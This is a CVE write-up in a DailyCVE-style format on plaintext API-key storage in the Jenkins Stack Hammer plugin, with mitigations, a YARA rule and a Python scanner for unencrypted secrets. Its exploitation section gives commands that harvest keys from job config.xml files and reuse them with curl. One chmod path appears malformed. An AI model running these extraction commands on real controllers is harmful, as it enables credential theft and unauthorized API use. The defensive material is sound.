How CVE-2025-31726 Works
The Jenkins Stack Hammer Plugin (version 1.0.6 and earlier) stores Stack Hammer API keys unencrypted in job `config.xml` files on the Jenkins controller, instead of as Jenkins `Secret` values, which core encrypts with the controller's master key before writing them to disk. Anyone who can read those files recovers the key: users holding Item/Extended Read permission (Jenkins serves each job's `config.xml` to them through the web UI and REST endpoint) and anyone with filesystem access to the controller, including backup operators and other processes on the host. The impact is unauthorized use of the Stack Hammer API with the victim's key; the flaw does not by itself grant additional Jenkins permissions.
DailyCVE Form
Platform: Jenkins
Version: ≤1.0.6
Vulnerability: Plaintext API Key Storage
Severity: Medium
Date: 04/17/2025
What Undercode Say:
Exploitation:
1. Manual Extraction (needs a shell on the controller, or a copy of JENKINS_HOME such as a backup). The element name the plugin uses for the key is not given here, so widen the pattern beyond "api_key" if nothing matches:
grep -ri "api_key" /var/lib/jenkins/jobs/ --include=config.xml
2. Jenkins Script Console (requires Overall/Administer, so this is not the low-privilege path; it just dumps every item's config.xml in one pass). A user who holds only Item/Extended Read downloads the same file per job from the web endpoint /job/<name>/config.xml, which is the access the advisory describes:
Jenkins.instance.getAllItems().each { job ->
    println("Job: ${job.fullName}")
    println(job.configFile.asString())
}
3. API Key Abuse (api.targethost.com/endpoint is a placeholder, since the real Stack Hammer API endpoint is not given here; replace <API_KEY> with the recovered value):
curl -X POST -H "Authorization: Bearer <API_KEY>" https://api.targethost.com/endpoint
Mitigation:
1. Upgrade Plugin: install the fixed release once the maintainer publishes one. The Jenkins security advisory for this CVE listed no fix at the time of publication, so check the advisory rather than assuming a 1.0.7 exists. With the plugin installation manager (stack-hammer is the assumed plugin id):
jenkins-plugin-cli --plugins stack-hammer:<fixed-version>
2. Credential Encryption: keep the key in the Jenkins credentials store as a Secret text credential (encrypted on disk) and inject it into the build with the Credentials Binding plugin, instead of typing it into the plugin's job field. This only helps when the step can take the key from the environment; a key entered in the plugin's own field is still written to config.xml in plaintext. Do not echo the bound variable to a file, which would recreate the problem:
withCredentials([string(credentialsId: 'secure-key', variable: 'API_KEY')]) {
    sh 'curl -H "Authorization: Bearer $API_KEY" https://api.targethost.com/endpoint'
}
3. File Permissions: restrict job directories to the jenkins user. Note the limit: Jenkins reads these files as that user regardless, so this does nothing against Extended Read users fetching config.xml over HTTP; it only blocks other local accounts on the controller.
chmod 600 /var/lib/jenkins/jobs//config.xml
4. Audit Logging: Jenkins core has no setting that logs reads of config.xml, and the system property sometimes quoted for this (jenkins.security.ApiKeyFilter.audit) does not exist. Use the Audit Trail plugin (see Detection) and extend its URL pattern setting to match /config.xml, so that downloads of job configuration by Extended Read users are recorded with the requesting user.
Detection:
1. YARA Rule (the <apiKey> element name is a guess at what the plugin writes; replace it with the real element once you have a sample config.xml. The rule also fires on properly encrypted fields, so confirm that a hit's value is not in the {...} form Jenkins uses for Secret-encrypted strings):
rule jenkins_api_key_leak
{
    strings:
        $xml = "<apiKey>" nocase
    condition:
        $xml
}
2. Jenkins Audit Plugin: install the Audit Trail plugin through the CLI (replace the URL and credentials with your own):
java -jar jenkins-cli.jar -s https://jenkins.example/ -auth <user>:<api-token> install-plugin audit-trail
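A scanner for the same condition, added here as an example that is not part of the original post or of the Stack Hammer plugin: it parses a job's config.xml, flags credential-like elements whose value is not in the {base64} form Jenkins writes for Secret-encrypted strings, and runs against a constructed sample. The builder class name, the stackHammerApiKey element, the key value and the endpoint in the sample are invented; the real plugin's element name is not given on this page, which is why the scanner matches on a family of credential-like names rather than one tag.

```python
import re
import xml.etree.ElementTree as ET
from pathlib import Path

# Element names that plugins commonly use for credential fields.
SENSITIVE_TAG = re.compile(r"api[_-]?key|token|secret|password|passwd", re.IGNORECASE)

# Jenkins' Secret type serialises an encrypted value as "{<base64>}" (the
# "{AQAAABAAAA...}" form). A value in that shape was encrypted with the
# controller's master key; a bare value in a credential element is plaintext.
# (Very old Jenkins versions wrote base64 without braces; extend the pattern
# if you still have such files.)
ENCRYPTED_SECRET = re.compile(r"^\{[A-Za-z0-9+/=]+\}$")


def is_encrypted_secret(value: str) -> bool:
    """True if the text looks like a Jenkins Secret-encrypted string."""
    return bool(ENCRYPTED_SECRET.match(value.strip()))


def find_plaintext_secrets(config_xml: str):
    """Return (element path, value) pairs for credential-like elements whose
    text is not a Jenkins-encrypted Secret."""
    root = ET.fromstring(config_xml)
    findings = []

    def walk(elem, path):
        tag = elem.tag.split("}")[-1]          # drop any XML namespace prefix
        here = f"{path}/{tag}"
        text = (elem.text or "").strip()
        if text and SENSITIVE_TAG.search(tag) and not is_encrypted_secret(text):
            findings.append((here, text))
        for child in elem:
            walk(child, here)

    walk(root, "")
    return findings


def scan_jenkins_home(jenkins_home):
    """Map every jobs/**/config.xml under JENKINS_HOME to its findings."""
    results = {}
    for cfg in Path(jenkins_home).glob("jobs/**/config.xml"):
        try:
            hits = find_plaintext_secrets(cfg.read_text(encoding="utf-8"))
        except ET.ParseError:
            continue                             # not parseable XML, skip it
        if hits:
            results[str(cfg)] = hits
    return results


# Constructed sample config.xml. The builder class, the stackHammerApiKey
# element and the key value are invented for this example; the second
# builder shows what a properly Secret-encrypted field looks like.
SAMPLE_CONFIG = """<?xml version='1.0' encoding='UTF-8'?>
<project>
  <description>nightly build</description>
  <builders>
    <com.example.StackHammerBuilder plugin="stack-hammer@1.0.6">
      <stackHammerApiKey>sh_live_0123456789abcdef</stackHammerApiKey>
      <endpoint>https://api.example.invalid/v1</endpoint>
    </com.example.StackHammerBuilder>
    <com.example.OtherBuilder>
      <password>{AQAAABAAAAAQ0m7S9z6eWq1mQ4vG5r7a7Y2rJxP3G8ZpJ1kk4Yo2h5Q=}</password>
    </com.example.OtherBuilder>
  </builders>
</project>
"""

if __name__ == "__main__":
    for path, value in find_plaintext_secrets(SAMPLE_CONFIG):
        # Print only a prefix so the scanner does not itself leak the key.
        print(f"plaintext credential at {path}: {value[:7]}...")
```

Run scan_jenkins_home("/var/lib/jenkins") on the controller to cover every job, including jobs nested in folders; the encrypted password in the sample is deliberately left unflagged so the output reflects only fields a plugin wrote without Secret.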
References:
Reported By: nvd.nist.gov